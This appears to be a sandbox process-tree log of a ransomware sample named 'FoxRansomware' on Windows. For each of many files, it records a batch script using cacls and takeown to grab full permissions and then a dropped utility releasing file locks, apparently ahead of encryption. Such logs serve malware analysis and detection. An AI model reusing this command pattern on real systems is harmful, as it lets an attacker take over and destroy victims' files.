C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yMelI2Cu.exeyMelI2Cu.exe -accepteula "00000083.bin" -nobanner4⤵PID:6668
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yMelI2Cu.exeyMelI2Cu.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:6544
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\XWcOhn4J.bat" "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000009F.bin""2⤵PID:6496
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000009F.bin" /E /G Admin:F /C3⤵PID:5896
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000009F.bin"3⤵
- Modifies file permissions
PID:6684
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c yMelI2Cu.exe -accepteula "0000009F.bin" -nobanner3⤵PID:6696
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yMelI2Cu.exeyMelI2Cu.exe -accepteula "0000009F.bin" -nobanner4⤵PID:6860
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yMelI2Cu.exeyMelI2Cu.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:6980
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\XWcOhn4J.bat" "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\000000AL.bin""2⤵PID:7024
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\000000AL.bin" /E /G Admin:F /C3⤵PID:6636
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\000000AL.bin"3⤵PID:6504
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c yMelI2Cu.exe -accepteula "000000AL.bin" -nobanner3⤵PID:4064
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yMelI2Cu.exeyMelI2Cu.exe -accepteula "000000AL.bin" -nobanner4⤵PID:6912
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yMelI2Cu.exeyMelI2Cu.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:5592
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\XWcOhn4J.bat" "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\000000B1.bin""2⤵PID:7096
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\000000B1.bin" /E /G Admin:F /C3⤵PID:5872
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\000000B1.bin"3⤵
- Modifies file permissions
PID:6852
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c yMelI2Cu.exe -accepteula "000000B1.bin" -nobanner3⤵PID:2408
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yMelI2Cu.exeyMelI2Cu.exe -accepteula "000000B1.bin" -nobanner4⤵PID:5652
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yMelI2Cu.exeyMelI2Cu.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:5876
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\XWcOhn4J.bat" "C:\ProgramData\Microsoft\UEV\InboxTemplates\MicrosoftNotepad.xml""2⤵PID:5204
-
C:\Windows\SysWOW64\cacls.execacls "C:\ProgramData\Microsoft\UEV\InboxTemplates\MicrosoftNotepad.xml" /E /G Admin:F /C3⤵PID:5952
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\ProgramData\Microsoft\UEV\InboxTemplates\MicrosoftNotepad.xml"3⤵PID:6464
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c yMelI2Cu.exe -accepteula "MicrosoftNotepad.xml" -nobanner3⤵PID:5392
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yMelI2Cu.exeyMelI2Cu.exe -accepteula "MicrosoftNotepad.xml" -nobanner4⤵PID:3548
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yMelI2Cu.exeyMelI2Cu.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:7124
-
-
-
C:\Windows\SysWOW64\cmd.exe | C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\XWcOhn4J.bat" "C:\ProgramData\Microsoft\UEV\InboxTemplates\MicrosoftOffice2016BackupWin64.xml"" | PID:3668
    C:\Windows\SysWOW64\cacls.exe | cacls "C:\ProgramData\Microsoft\UEV\InboxTemplates\MicrosoftOffice2016BackupWin64.xml" /E /G Admin:F /C | PID:1288
    C:\Windows\SysWOW64\takeown.exe | takeown /F "C:\ProgramData\Microsoft\UEV\InboxTemplates\MicrosoftOffice2016BackupWin64.xml" | PID:4532 | Modifies file permissions
    C:\Windows\SysWOW64\cmd.exe | C:\Windows\system32\cmd.exe /c yMelI2Cu.exe -accepteula "MicrosoftOffice2016BackupWin64.xml" -nobanner | PID:5564
        C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yMelI2Cu.exe | yMelI2Cu.exe -accepteula "MicrosoftOffice2016BackupWin64.xml" -nobanner | PID:6132
    C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yMelI2Cu.exe | yMelI2Cu.exe -accepteula -c Run -y -p extract -nobanner | PID:5496

C:\Windows\SysWOW64\cmd.exe | C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\XWcOhn4J.bat" "C:\ProgramData\Microsoft\UEV\InboxTemplates\NetworkPrinters.xml"" | PID:1000
    C:\Windows\SysWOW64\cacls.exe | cacls "C:\ProgramData\Microsoft\UEV\InboxTemplates\NetworkPrinters.xml" /E /G Admin:F /C | PID:7404
    C:\Windows\SysWOW64\takeown.exe | takeown /F "C:\ProgramData\Microsoft\UEV\InboxTemplates\NetworkPrinters.xml" | PID:708
    C:\Windows\SysWOW64\cmd.exe | C:\Windows\system32\cmd.exe /c yMelI2Cu.exe -accepteula "NetworkPrinters.xml" -nobanner | PID:2672
        C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yMelI2Cu.exe | yMelI2Cu.exe -accepteula "NetworkPrinters.xml" -nobanner | PID:3524
    C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yMelI2Cu.exe | yMelI2Cu.exe -accepteula -c Run -y -p extract -nobanner | PID:3168

C:\Windows\SysWOW64\cmd.exe | C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\XWcOhn4J.bat" "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000007R.bin"" | PID:5024
    C:\Windows\SysWOW64\cacls.exe | cacls "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000007R.bin" /E /G Admin:F /C | PID:4292
    C:\Windows\SysWOW64\takeown.exe | takeown /F "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000007R.bin" | PID:2440 | Modifies file permissions
    C:\Windows\SysWOW64\cmd.exe | C:\Windows\system32\cmd.exe /c yMelI2Cu.exe -accepteula "0000007R.bin" -nobanner | PID:2560
        C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yMelI2Cu.exe | yMelI2Cu.exe -accepteula "0000007R.bin" -nobanner | PID:2064
    C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yMelI2Cu.exe | yMelI2Cu.exe -accepteula -c Run -y -p extract -nobanner | PID:4316

C:\Windows\SysWOW64\cmd.exe | C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\XWcOhn4J.bat" "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\00000085.bin"" | PID:2272
    C:\Windows\SysWOW64\cacls.exe | cacls "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\00000085.bin" /E /G Admin:F /C | PID:4388
    C:\Windows\SysWOW64\takeown.exe | takeown /F "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\00000085.bin" | PID:5304
    C:\Windows\SysWOW64\cmd.exe | C:\Windows\system32\cmd.exe /c yMelI2Cu.exe -accepteula "00000085.bin" -nobanner | PID:1056
        C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yMelI2Cu.exe | yMelI2Cu.exe -accepteula "00000085.bin" -nobanner | PID:1972
    C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yMelI2Cu.exe | yMelI2Cu.exe -accepteula -c Run -y -p extract -nobanner | PID:6036

C:\Windows\SysWOW64\cmd.exe | C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\XWcOhn4J.bat" "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000008R.bin"" | PID:2128
    C:\Windows\SysWOW64\cacls.exe | cacls "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000008R.bin" /E /G Admin:F /C | PID:7236
    C:\Windows\SysWOW64\takeown.exe | takeown /F "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000008R.bin" | PID:5596
    C:\Windows\SysWOW64\cmd.exe | C:\Windows\system32\cmd.exe /c yMelI2Cu.exe -accepteula "0000008R.bin" -nobanner | PID:1364
        C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yMelI2Cu.exe | yMelI2Cu.exe -accepteula "0000008R.bin" -nobanner | PID:5696
    C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yMelI2Cu.exe | yMelI2Cu.exe -accepteula -c Run -y -p extract -nobanner | PID:5164

C:\Windows\SysWOW64\cmd.exe | C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\XWcOhn4J.bat" "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000009H.bin"" | PID:4992
    C:\Windows\SysWOW64\cacls.exe | cacls "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000009H.bin" /E /G Admin:F /C | PID:2808
    C:\Windows\SysWOW64\takeown.exe | takeown /F "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000009H.bin" | PID:4812
    C:\Windows\SysWOW64\cmd.exe | C:\Windows\system32\cmd.exe /c yMelI2Cu.exe -accepteula "0000009H.bin" -nobanner | PID:4576
        C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yMelI2Cu.exe | yMelI2Cu.exe -accepteula "0000009H.bin" -nobanner | PID:6564
    C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yMelI2Cu.exe | yMelI2Cu.exe -accepteula -c Run -y -p extract -nobanner | PID:6572

C:\Windows\SysWOW64\cmd.exe | C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\XWcOhn4J.bat" "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\000000AD.bin"" | PID:1696
    C:\Windows\SysWOW64\cacls.exe | cacls "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\000000AD.bin" /E /G Admin:F /C | PID:6588
    C:\Windows\SysWOW64\takeown.exe | takeown /F "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\000000AD.bin" | PID:5940
    C:\Windows\SysWOW64\cmd.exe | C:\Windows\system32\cmd.exe /c yMelI2Cu.exe -accepteula "000000AD.bin" -nobanner | PID:5828
        C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yMelI2Cu.exe | yMelI2Cu.exe -accepteula "000000AD.bin" -nobanner | PID:5976
    C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yMelI2Cu.exe | yMelI2Cu.exe -accepteula -c Run -y -p extract -nobanner | PID:5100

C:\Windows\SysWOW64\cmd.exe | C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\XWcOhn4J.bat" "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\000000AN.bin"" | PID:2184
    C:\Windows\SysWOW64\cacls.exe | cacls "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\000000AN.bin" /E /G Admin:F /C | PID:4848
    C:\Windows\SysWOW64\takeown.exe | takeown /F "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\000000AN.bin" | PID:5764
    C:\Windows\SysWOW64\cmd.exe | C:\Windows\system32\cmd.exe /c yMelI2Cu.exe -accepteula "000000AN.bin" -nobanner | PID:7600
        C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yMelI2Cu.exe | yMelI2Cu.exe -accepteula "000000AN.bin" -nobanner | PID:4768
    C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yMelI2Cu.exe | yMelI2Cu.exe -accepteula -c Run -y -p extract -nobanner | PID:5380

C:\Windows\SysWOW64\cmd.exe | C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\XWcOhn4J.bat" "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\000000B3.bin"" | PID:6284
    C:\Windows\SysWOW64\cacls.exe | cacls "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\000000B3.bin" /E /G Admin:F /C | PID:6612
    C:\Windows\SysWOW64\takeown.exe | takeown /F "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\000000B3.bin" | PID:5500 | Modifies file permissions
    C:\Windows\SysWOW64\cmd.exe | C:\Windows\system32\cmd.exe /c yMelI2Cu.exe -accepteula "000000B3.bin" -nobanner | PID:5132
        C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yMelI2Cu.exe | yMelI2Cu.exe -accepteula "000000B3.bin" -nobanner | PID:7196
    C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yMelI2Cu.exe | yMelI2Cu.exe -accepteula -c Run -y -p extract -nobanner | PID:1684

C:\Windows\SysWOW64\cmd.exe | C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\XWcOhn4J.bat" "C:\ProgramData\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\background.png"" | PID:4492
    C:\Windows\SysWOW64\cacls.exe | cacls "C:\ProgramData\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\background.png" /E /G Admin:F /C | PID:2636
    C:\Windows\SysWOW64\takeown.exe | takeown /F "C:\ProgramData\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\background.png" | PID:4076 | Modifies file permissions
    C:\Windows\SysWOW64\cmd.exe | C:\Windows\system32\cmd.exe /c yMelI2Cu.exe -accepteula "background.png" -nobanner | PID:1008
        C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yMelI2Cu.exe | yMelI2Cu.exe -accepteula "background.png" -nobanner | PID:4476
    C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yMelI2Cu.exe | yMelI2Cu.exe -accepteula -c Run -y -p extract -nobanner | PID:5424

C:\Windows\SysWOW64\cmd.exe | C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\XWcOhn4J.bat" "C:\ProgramData\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\es-ES\resource.xml"" | PID:2776
    C:\Windows\SysWOW64\cacls.exe | cacls "C:\ProgramData\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\es-ES\resource.xml" /E /G Admin:F /C | PID:6076
    C:\Windows\SysWOW64\takeown.exe | takeown /F "C:\ProgramData\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\es-ES\resource.xml" | PID:6100
    C:\Windows\SysWOW64\cmd.exe | C:\Windows\system32\cmd.exe /c yMelI2Cu.exe -accepteula "resource.xml" -nobanner | PID:6328
        C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yMelI2Cu.exe | yMelI2Cu.exe -accepteula "resource.xml" -nobanner | PID:5328
    C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yMelI2Cu.exe | yMelI2Cu.exe -accepteula -c Run -y -p extract -nobanner | PID:7172

C:\Windows\SysWOW64\cmd.exe | C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\XWcOhn4J.bat" "C:\ProgramData\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\it-IT\resource.xml"" | PID:6244
    C:\Windows\SysWOW64\cacls.exe | cacls "C:\ProgramData\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\it-IT\resource.xml" /E /G Admin:F /C | PID:7436
    C:\Windows\SysWOW64\takeown.exe | takeown /F "C:\ProgramData\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\it-IT\resource.xml" | PID:7296 | Modifies file permissions
    C:\Windows\SysWOW64\cmd.exe | C:\Windows\system32\cmd.exe /c yMelI2Cu.exe -accepteula "resource.xml" -nobanner | PID:5332
        C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yMelI2Cu.exe | yMelI2Cu.exe -accepteula "resource.xml" -nobanner | PID:7248
    C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yMelI2Cu.exe | yMelI2Cu.exe -accepteula -c Run -y -p extract -nobanner | PID:7388

C:\Windows\SysWOW64\cmd.exe | C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\XWcOhn4J.bat" "C:\ProgramData\USOShared\Logs\System\WuProvider.5614d2b7-6b02-4e2f-b333-e8093cecd5f2.1.etl"" | PID:696
    C:\Windows\SysWOW64\cacls.exe | cacls "C:\ProgramData\USOShared\Logs\System\WuProvider.5614d2b7-6b02-4e2f-b333-e8093cecd5f2.1.etl" /E /G Admin:F /C | PID:2320
    C:\Windows\SysWOW64\takeown.exe | takeown /F "C:\ProgramData\USOShared\Logs\System\WuProvider.5614d2b7-6b02-4e2f-b333-e8093cecd5f2.1.etl" | PID:7864
    C:\Windows\SysWOW64\cmd.exe | C:\Windows\system32\cmd.exe /c yMelI2Cu.exe -accepteula "WuProvider.5614d2b7-6b02-4e2f-b333-e8093cecd5f2.1.etl" -nobanner | PID:7664
        C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yMelI2Cu.exe | yMelI2Cu.exe -accepteula "WuProvider.5614d2b7-6b02-4e2f-b333-e8093cecd5f2.1.etl" -nobanner | PID:7552
    C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yMelI2Cu.exe | yMelI2Cu.exe -accepteula -c Run -y -p extract -nobanner | PID:7484

C:\Windows\SysWOW64\cmd.exe | C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\XWcOhn4J.bat" "C:\ProgramData\Microsoft\UEV\InboxTemplates\MicrosoftOffice2010Win32.xml"" | PID:7340
    C:\Windows\SysWOW64\cacls.exe | cacls "C:\ProgramData\Microsoft\UEV\InboxTemplates\MicrosoftOffice2010Win32.xml" /E /G Admin:F /C | PID:7792
    C:\Windows\SysWOW64\takeown.exe | takeown /F "C:\ProgramData\Microsoft\UEV\InboxTemplates\MicrosoftOffice2010Win32.xml" | PID:7796
    C:\Windows\SysWOW64\cmd.exe | C:\Windows\system32\cmd.exe /c yMelI2Cu.exe -accepteula "MicrosoftOffice2010Win32.xml" -nobanner | PID:7648
        C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yMelI2Cu.exe | yMelI2Cu.exe -accepteula "MicrosoftOffice2010Win32.xml" -nobanner | PID:7884
    C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yMelI2Cu.exe | yMelI2Cu.exe -accepteula -c Run -y -p extract -nobanner | PID:7736

C:\Windows\SysWOW64\cmd.exe | C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\XWcOhn4J.bat" "C:\ProgramData\Microsoft\UEV\InboxTemplates\MicrosoftOffice2016Win32.xml"" | PID:284
    C:\Windows\SysWOW64\cacls.exe | cacls "C:\ProgramData\Microsoft\UEV\InboxTemplates\MicrosoftOffice2016Win32.xml" /E /G Admin:F /C | PID:6084
    C:\Windows\SysWOW64\takeown.exe | takeown /F "C:\ProgramData\Microsoft\UEV\InboxTemplates\MicrosoftOffice2016Win32.xml" | PID:7984
    C:\Windows\SysWOW64\cmd.exe | C:\Windows\system32\cmd.exe /c yMelI2Cu.exe -accepteula "MicrosoftOffice2016Win32.xml" -nobanner | PID:7912
        C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yMelI2Cu.exe | yMelI2Cu.exe -accepteula "MicrosoftOffice2016Win32.xml" -nobanner | PID:7896
    C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yMelI2Cu.exe | yMelI2Cu.exe -accepteula -c Run -y -p extract -nobanner | PID:8080

C:\Windows\SysWOW64\cmd.exe | C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\XWcOhn4J.bat" "C:\ProgramData\Microsoft\UEV\InboxTemplates\RoamingCredentialSettings.xml"" | PID:8076
    C:\Windows\SysWOW64\cacls.exe | cacls "C:\ProgramData\Microsoft\UEV\InboxTemplates\RoamingCredentialSettings.xml" /E /G Admin:F /C | PID:4568
    C:\Windows\SysWOW64\takeown.exe | takeown /F "C:\ProgramData\Microsoft\UEV\InboxTemplates\RoamingCredentialSettings.xml" | PID:8012 | Modifies file permissions
    C:\Windows\SysWOW64\cmd.exe | C:\Windows\system32\cmd.exe /c yMelI2Cu.exe -accepteula "RoamingCredentialSettings.xml" -nobanner | PID:7972
        C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yMelI2Cu.exe | yMelI2Cu.exe -accepteula "RoamingCredentialSettings.xml" -nobanner | PID:8028
    C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yMelI2Cu.exe | yMelI2Cu.exe -accepteula -c Run -y -p extract -nobanner | PID:8176

C:\Windows\SysWOW64\cmd.exe | C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\XWcOhn4J.bat" "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\00000004.bin"" | PID:8156
    C:\Windows\SysWOW64\cacls.exe | cacls "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\00000004.bin" /E /G Admin:F /C | PID:6576
    C:\Windows\SysWOW64\takeown.exe | takeown /F "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\00000004.bin" | PID:1920
    C:\Windows\SysWOW64\cmd.exe | C:\Windows\system32\cmd.exe /c yMelI2Cu.exe -accepteula "00000004.bin" -nobanner | PID:5036
        C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yMelI2Cu.exe | yMelI2Cu.exe -accepteula "00000004.bin" -nobanner | PID:784
    C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yMelI2Cu.exe | yMelI2Cu.exe -accepteula -c Run -y -p extract -nobanner | PID:5476

C:\Windows\SysWOW64\cmd.exe | C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\XWcOhn4J.bat" "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000000H.bin"" | PID:7612
    C:\Windows\SysWOW64\cacls.exe | cacls "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000000H.bin" /E /G Admin:F /C | PID:1796
    C:\Windows\SysWOW64\takeown.exe | takeown /F "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000000H.bin" | PID:7068
    C:\Windows\SysWOW64\cmd.exe | C:\Windows\system32\cmd.exe /c yMelI2Cu.exe -accepteula "0000000H.bin" -nobanner | PID:6660
        C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yMelI2Cu.exe | yMelI2Cu.exe -accepteula "0000000H.bin" -nobanner | PID:6720
    C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yMelI2Cu.exe | yMelI2Cu.exe -accepteula -c Run -y -p extract -nobanner | PID:6664

C:\Windows\SysWOW64\cmd.exe | C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\XWcOhn4J.bat" "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000000S.bin"" | PID:5900
    C:\Windows\SysWOW64\cacls.exe | cacls "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000000S.bin" /E /G Admin:F /C | PID:6860
    C:\Windows\SysWOW64\takeown.exe | takeown /F "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000000S.bin" | PID:6752 | Modifies file permissions
    C:\Windows\SysWOW64\cmd.exe | C:\Windows\system32\cmd.exe /c yMelI2Cu.exe -accepteula "0000000S.bin" -nobanner | PID:6980
        C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yMelI2Cu.exe | yMelI2Cu.exe -accepteula "0000000S.bin" -nobanner | PID:6552
    C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yMelI2Cu.exe | yMelI2Cu.exe -accepteula -c Run -y -p extract -nobanner | PID:6532

C:\Windows\SysWOW64\cmd.exe | C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\XWcOhn4J.bat" "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\00000016.bin"" | PID:6628
    C:\Windows\SysWOW64\cacls.exe | cacls "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\00000016.bin" /E /G Admin:F /C | PID:6888
    C:\Windows\SysWOW64\takeown.exe | takeown /F "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\00000016.bin" | PID:4064
    C:\Windows\SysWOW64\cmd.exe | C:\Windows\system32\cmd.exe /c yMelI2Cu.exe -accepteula "00000016.bin" -nobanner | PID:6604
        C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yMelI2Cu.exe | yMelI2Cu.exe -accepteula "00000016.bin" -nobanner | PID:7000
    C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yMelI2Cu.exe | yMelI2Cu.exe -accepteula -c Run -y -p extract -nobanner | PID:6924

C:\Windows\SysWOW64\cmd.exe | C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\XWcOhn4J.bat" "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\00000050.bin"" | PID:1624
    C:\Windows\SysWOW64\cacls.exe | cacls "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\00000050.bin" /E /G Admin:F /C | PID:4312
    C:\Windows\SysWOW64\takeown.exe | takeown /F "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\00000050.bin" | PID:2408
    C:\Windows\SysWOW64\cmd.exe | C:\Windows\system32\cmd.exe /c yMelI2Cu.exe -accepteula "00000050.bin" -nobanner | PID:4952
        C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yMelI2Cu.exe | yMelI2Cu.exe -accepteula "00000050.bin" -nobanner | PID:6484
    C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yMelI2Cu.exe | yMelI2Cu.exe -accepteula -c Run -y -p extract -nobanner | PID:7096

C:\Windows\SysWOW64\cmd.exe | C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\XWcOhn4J.bat" "C:\ProgramData\USOShared\Logs\System\WuProvider.e4dfcb82-48bd-4bac-bc11-42668b431292.1.etl"" | PID:5692
    C:\Windows\SysWOW64\cacls.exe | cacls "C:\ProgramData\USOShared\Logs\System\WuProvider.e4dfcb82-48bd-4bac-bc11-42668b431292.1.etl" /E /G Admin:F /C | PID:7140
    C:\Windows\SysWOW64\takeown.exe | takeown /F "C:\ProgramData\USOShared\Logs\System\WuProvider.e4dfcb82-48bd-4bac-bc11-42668b431292.1.etl" | PID:5516
    C:\Windows\SysWOW64\cmd.exe | C:\Windows\system32\cmd.exe /c yMelI2Cu.exe -accepteula "WuProvider.e4dfcb82-48bd-4bac-bc11-42668b431292.1.etl" -nobanner | PID:6916
        C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yMelI2Cu.exe | yMelI2Cu.exe -accepteula "WuProvider.e4dfcb82-48bd-4bac-bc11-42668b431292.1.etl" -nobanner | PID:2932
    C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yMelI2Cu.exe | yMelI2Cu.exe -accepteula -c Run -y -p extract -nobanner | PID:6424

C:\Windows\SysWOW64\cmd.exe | C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\XWcOhn4J.bat" "C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\Settings\settings.dat.LOG1"" | PID:7112
    C:\Windows\SysWOW64\cacls.exe | cacls "C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\Settings\settings.dat.LOG1" /E /G Admin:F /C | PID:6132
